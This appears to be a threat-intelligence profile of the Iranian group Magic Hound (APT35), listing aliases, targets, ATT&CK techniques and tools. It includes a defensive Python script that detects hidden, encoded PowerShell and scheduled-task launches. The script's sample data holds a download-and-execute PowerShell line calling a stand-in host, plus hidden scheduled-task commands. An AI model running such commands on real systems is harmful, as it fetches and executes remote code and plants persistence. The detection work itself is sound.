Magic Hound
Also known as: TA453 · COBALT ILLUSION · Charming Kitten · ITG18 · Phosphorus · Newscaster · APT35 · Mint Sandstorm
Overview
Magic Hound is an Iranian state-sponsored threat group that conducts long-term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. Since at least 2014 it has targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), primarily through elaborate social engineering campaigns.
Targets
Defense · Diplomacy · Government · Military · Technology
Regions
Iraq · Israel · Saudi Arabia · U.S. government/defense sector websites · United Kingdom
Capabilities
- Exploitation of public-facing / client applications — ATT&CK T1190
- Custom malware/implant development — ATT&CK: 3 attributed custom malware families
TTPs — 78 techniques across 14 tactics
Reconnaissance
- T1589 Gather Victim Identity Information
- T1589.001 Credentials
- T1589.002 Email Addresses
- T1590.005 IP Addresses
- T1591.001 Determine Physical Locations
- T1592.002 Software
- T1595.002 Vulnerability Scanning
- T1598.003 Spearphishing Link
Resource Development
- T1583.001 Domains
- T1583.006 Web Services
- T1584.001 Domains
- T1585.001 Social Media Accounts
- T1585.002 Email Accounts
- T1586.002 Email Accounts
- T1588.002 Tool
Initial Access
- T1189 Drive-by Compromise
- T1190 Exploit Public-Facing Application
- T1566.002 Spearphishing Link
- T1566.003 Spearphishing via Service
Execution
- T1047 Windows Management Instrumentation
- T1053.005 Scheduled Task
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1059.005 Visual Basic
- T1204.001 Malicious Link
- T1204.002 Malicious File
Persistence
- T1098.002 Additional Email Delegate Permissions
- T1098.007 Additional Local or Domain Groups
- T1136.001 Local Account
- T1505.003 Web Shell
- T1547.001 Registry Run Keys / Startup Folder
Stealth
- T1027.010 Command Obfuscation
- T1027.013 Encrypted/Encoded File
- T1036.004 Masquerade Task or Service
- T1036.005 Match Legitimate Resource Name or Location
- T1036.010 Masquerade Account Name
- T1070.003 Clear Command History
- T1070.004 File Deletion
- T1078.001 Default Accounts
- T1078.002 Domain Accounts
- T1218.011 Rundll32
- T1564.003 Hidden Window
Defense Impairment
- T1112 Modify Registry
- T1685 Disable or Modify Tools
- T1685.001 Disable or Modify Windows Event Log
- T1686.003 Windows Host Firewall
Credential Access
- T1003.001 LSASS Memory
Discovery
- T1016 System Network Configuration Discovery
- T1016.001 Internet Connection Discovery
- T1016.002 Wi-Fi Discovery
- T1018 Remote System Discovery
- T1033 System Owner/User Discovery
- T1046 Network Service Discovery
- T1049 System Network Connections Discovery
- T1057 Process Discovery
- T1082 System Information Discovery
- T1083 File and Directory Discovery
- T1087.003 Email Account
- T1482 Domain Trust Discovery
Lateral Movement
- T1021.001 Remote Desktop Protocol
- T1570 Lateral Tool Transfer
Collection
- T1005 Data from Local System
- T1056.001 Keylogging
- T1113 Screen Capture
- T1114 Email Collection
- T1114.001 Local Email Collection
- T1114.002 Remote Email Collection
- T1560.001 Archive via Utility
Command and Control
- T1071 Application Layer Protocol
- T1071.001 Web Protocols
- T1090 Proxy
- T1102.002 Bidirectional Communication
- T1105 Ingress Tool Transfer
- T1571 Non-Standard Port
- T1572 Protocol Tunneling
- T1573 Encrypted Channel
Exfiltration
- (no techniques listed)
Impact
- (no techniques listed)
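The technique list above is a catalog, not a detection. As an added example (not threatfilter.dev's code, nor any vendor's), the Python below triages constructed Sysmon-style process-creation records against a cluster of the listed techniques that tend to co-occur in one launch chain: PowerShell (T1059.001) started with a hidden window (T1564.003) and an encoded command (T1027.010), registered through a scheduled task (T1053.005), or run from a path where powershell.exe does not belong (T1036.005). The field names (image, parent, cmdline), the sample records and the decoded payload are assumptions made for illustration; the page lists the techniques but no command lines.

```python
import base64
import re

# Constructed sample payload and its -EncodedCommand form (base64 of UTF-16LE), for illustration only.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon-style process-creation records; field names are an assumption, not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": f"powershell.exe -NoP -NonI -W Hidden -Enc {ENCODED}"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": f'schtasks /create /tn "WindowsUpdateCheck" /sc minute /mo 10 '
                f'/tr "powershell -WindowStyle Hidden -EncodedCommand {ENCODED}"'},
    {"image": r"C:\Users\Public\Libraries\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"powershell.exe -enc {ENCODED}"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
]

PS_NAMES = {"powershell", "pwsh", "powershell_ise"}
# The two legitimate install paths for powershell.exe on a 64-bit Windows host.
PS_HOME = re.compile(r"c:\\windows\\(system32|syswow64)\\windowspowershell\\v1\.0\\", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of a switch name, so match the common short forms too.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:i|in|ind|indowstyle)?\s+hidden", re.IGNORECASE)
TASK_ACTION_RE = re.compile(r"/tr\s+(\"[^\"]*\"|\S+)", re.IGNORECASE)


def _basename(image):
    """Lower-cased file name without the .exe suffix, for matching against PS_NAMES."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Map one process-creation event to the listed ATT&CK IDs its command line exhibits.

    Returns {"techniques": set of IDs, "decoded": decoded payload or None}.
    """
    name = _basename(ev["image"])
    cmd = ev["cmdline"]
    hits, decoded = set(), None
    if name in PS_NAMES:
        hits.add("T1059.001")                                   # PowerShell
        if HIDDEN_RE.search(cmd):
            hits.add("T1564.003")                               # Hidden Window
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.add("T1027.010")                               # Command Obfuscation (encoded command)
        # A full path outside the two real homes of powershell.exe is a masquerading copy.
        if name == "powershell" and "\\" in ev["image"] and not PS_HOME.match(ev["image"]):
            hits.add("T1036.005")                               # Match Legitimate Resource Name or Location
    elif name == "schtasks" and "/create" in cmd.lower():
        hits.add("T1053.005")                                   # Scheduled Task
        m = TASK_ACTION_RE.search(cmd)
        action = m.group(1).strip('"').strip() if m else ""
        if action:
            # Analyze the task's action as if it were its own launch, so a hidden encoded
            # PowerShell registered via schtasks is scored the same as a direct launch.
            inner = analyze_event({"image": action.split()[0], "parent": ev["image"], "cmdline": action})
            hits |= inner["techniques"]
            decoded = inner["decoded"]
    return {"techniques": hits, "decoded": decoded}


def is_suspicious(hits):
    """A lone interpreter launch is routine admin activity; flag when two or more listed techniques co-occur."""
    return len(hits) >= 2


def triage(events):
    """Return (index, sorted technique IDs, decoded payload or None) for every event that crosses the threshold."""
    out = []
    for i, ev in enumerate(events):
        r = analyze_event(ev)
        if is_suspicious(r["techniques"]):
            out.append((i, sorted(r["techniques"]), r["decoded"]))
    return out


if __name__ == "__main__":
    for idx, techs, payload in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(techs)}")
        if payload:
            print(f"  decoded: {payload}")
```

The threshold is deliberately a co-occurrence count rather than a single-indicator match: `-EncodedCommand` and `-WindowStyle Hidden` each appear in legitimate automation, but together with a scheduled-task registration or a powershell.exe outside its install directory they describe the execution and stealth pattern catalogued above. Decoding the encoded command at triage time is what turns an opaque launch into something an analyst can read.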
Tools & malware (13)
Net · Impacket · Ping · CharmPower · FRP · Mimikatz · Systeminfo · ipconfig · netsh · PowerLess · Pupy · DownPaper · PsExec
Reporting (3)
- How Microsoft names threat actors — Microsoft
- APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit — Check Point
- Operation SpoofedScholars: A Conversation with TA453 — Miller, J. et al.